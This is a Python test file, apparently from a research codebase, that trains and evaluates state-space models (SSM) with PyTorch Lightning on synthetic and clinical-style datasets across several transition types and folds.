print(f'[COMPLETE] model config {k+1}: mean nelbo: {np.mean(nelbos)}, std nelbo: {np.std(nelbos)}')
print()
def test_ssm_semi_synthetic():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='semi_synthetic', type=str)
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=True, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 100
args.ttype = 'gated'
args.alpha1_type = 'linear'
args.add_stochastic = False
args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
# args.C = 0.01; args.reg_all = False; args.reg_type = 'l2'
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[3])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:3')
else:
device = torch.device('cpu')
# ddata = load_ss_data(model.hparams['nsamples_syn'], gen_fly=True)
ddata = model.ddata
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=model.hparams['bs'], device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
print(f'nelbo: {nelbo}')
assert (nelbo.item() - 306) < 3e-1
def test_ssm_linear_mm():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 100
args.ttype = 'gated'
args.dim_stochastic = 48
args.dim_hidden = 300
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[1])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:1')
else:
device = torch.device('cpu')
_, valid_loader = model.load_helper('valid', device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
assert (nelbo.item() - 253.4) < 3e-1
def test_ssm_lin_mm(ttype='lin', fold=1, reg_all=False, C=0.01, reg_type='l1', ds=16, dh=300):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = ds
args.dim_hidden = dh
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + '_ssm_' + ttype + '_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
def test_ssm_nl_mm(ttype='nl', fold=1, reg_all=False, C=0.01, reg_type='l1', ds=16, dh=300):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = ds
args.dim_hidden = dh
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + '_ssm_' + ttype + '_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[1])
trainer.fit(model)
def test_ssm_moe_mm(ttype='moe', fold=1, reg_all=False, C=0.01, reg_type='l1', ds=16, dh=300):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = ds
args.dim_hidden = dh
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + '_ssm_' + ttype + '_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[2])
trainer.fit(model)
def test_ssm_gated_mm(fold=1, reg_all=True, C=0.01, reg_type='l2'):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = 'attn_transition'
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + 'ssm_ablation_noTELC_test{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[3])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
# if torch.cuda.is_available():
# device = torch.device('cuda:3')
# else:
# device = torch.device('cpu')
# _, valid_loader = model.load_helper('valid', device=device)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
# print(f'nelbo: {nelbo}')
# assert (nelbo.item() - 230) < 3e-1
def test_ssm_linear_syn():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 100
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[3])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:1')
else:
device = torch.device('cpu')
_, valid_loader = model.load_helper('valid', device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
assert (nelbo.item() - 191) < 3e-1
def test_sota_mm_semi():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 10000
args.ttype = 'gated'
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
trial = optuna.trial.FixedTrial({'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': 48})
model = SSM(trial, **dict_args)
import pdb; pdb.set_trace()
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, \
checkpoint_callback=False, gpus=[1], \
resume_from_checkpoint='/afs/csail.mit.edu/u/z/zeshanmh/research/ief/ief_core/tbp_logs/checkpoints/ssm_mm_sota_fold1_epoch=13743-val_loss=66.07.ckpt')
# automatically restores model, epoch, step, LR schedulers, apex, etc...
trainer.fit(model)
if torch.cuda.is_available():
device = torch.device('cuda:1')
else:
device = torch.device('cpu')
_, valid_loader = model.load_helper('valid', device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
print(f'nelbo: {nelbo}')
def test_ssm_gated_syn(ttype='attn_transition', num_samples=1000):
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='semi_synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=1500, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 1000
args.nsamples_syn = num_samples
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
args.C = 0.01; args.reg_all = True; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 128
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_semi_syn_' + ttype + '_' + str(args.nsamples_syn) + 'sample_complexity{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
def test_ssm_lin_syn(ttype='lin'):
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
args.C = 0.01; args.reg_all = True; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_syn_' + ttype + '500samp_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
def test_ssm_nl_syn(ttype='nl'):
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
args.C = 0.01; args.reg_all = True; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_syn_' + ttype + '500samp_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
# if torch.cuda.is_available():
# device = torch.device('cuda:1')
# else:
# device = torch.device('cpu')
# _, valid_loader = model.load_helper('valid', device=device)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
# assert (nelbo.item() - 166) < 3e-1
def test_ssm_syn_nolc():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
#parser.add_argument('--clock_ablation', type=strtobool, default=True, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = 'attn_transition'
args.alpha1_type = 'linear'
args.add_stochastic = False
args.clock_ablation = True
dict_args = vars(args)
args.C = 0.01; args.reg_all = False; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_syn_nolc{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
# if torch.cuda.is_available():
# device = torch.device('cuda:1')
# else:
# device = torch.device('cpu')
# _, valid_loader = model.load_helper('valid', device=device)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
# assert (nelbo.item() - 166) < 3e-1
if __name__ == '__main__':
samples = [20000]
for ss in samples:
test_ssm_gated_syn(ttype='attn_transition', num_samples=ss)
test_ssm_gated_syn(ttype='lin', num_samples=ss)
test_ssm_gated_syn(ttype='nl', num_samples=ss)
test_ssm_gated_syn(ttype='moe', num_samples=ss)
# configs = ['attn_transition', 'lin', 'nl']
# for config in configs:
# test_ssm_gated_syn(ttype=config)
# configs = [(0, 0.01, True, 'l2'), (1, 0.1, True, 'l2'), (2, 0.01, False, 'l1'), (3, 0.1, True, 'l2'), (4, 0.01, False, 'l2')]
# for config in configs:
# fold, C, reg_all, reg_type = config
# test_ssm_gated_mm(fold=fold, reg_all=reg_all, C=C, reg_type=reg_type)
# if fold != 3:
# test_ssm_gated_mm(fold,True)
# else:
# test_ssm_gated_mm(fold,False)
| 55.918345
| 232
| 0.685363
| 7,175
| 49,991
| 4.602927
| 0.051847
| 0.059953
| 0.113244
| 0.015261
| 0.909162
| 0.901774
| 0.897263
| 0.89481
| 0.886756
| 0.883122
| 0
| 0.032319
| 0.170011
| 49,991
| 893
| 233
| 55.980963
| 0.763641
| 0.157288
| 0
| 0.800933
| 0
| 0.009331
| 0.238056
| 0.017348
| 0
| 0
| 0
| 0
| 0.010886
| 1
| 0.024883
| false
| 0
| 0.055988
| 0
| 0.080871
| 0.027994
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
